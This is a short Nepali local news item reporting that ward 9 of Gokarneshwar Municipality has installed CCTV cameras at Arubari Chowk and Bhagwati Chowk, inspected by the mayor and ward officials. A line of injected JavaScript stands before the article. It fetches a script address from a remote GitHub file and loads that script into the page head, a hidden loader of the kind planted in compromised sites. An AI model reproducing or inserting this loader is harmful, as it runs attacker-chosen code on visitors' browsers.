;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौँ |
गोकर्णेश्वर नगरपालिका वडा नं ९ ले वडाका विभिन्न स्थानमा सिसिटिभि क्यामरा जडान गरि आज उद्घाटन गरेको छ | । शान्ति सुरक्षाका लागि सहयोग अभिवृद्धि तथा चोरी नियन्त्रणका लागि वडाका विभिन्न स्थानमा राखेको सिसिटिभि क्यामरा जडान गरेको हो |
आरुबारी चोक, भगवती चोक लगायतका क्षेत्रको सिसिटिभि क्यामरा जडानको अवस्थाबारे नगर प्रमुखले अवलोकन गर्नु भएको थियो | आज नगर प्रमुख दिपक रिसाल तथा वडा अध्यक्ष राजिव थापा, वडा सदस्यहरु श्रीकृष्ण कारञ्जित, उमेश चालिसे लगायत सरोकारवालाले अवलोकन गरेका थिए । आरुबारी चोक, भगवती चोक लगायतका क्षेत्रको सिसिटिभि क्यामरा जडानको अवस्थाबारे नगर प्रमुखले अवलोकन गर्नु भयो ।
फेसबुक प्रतिक्रियाहरु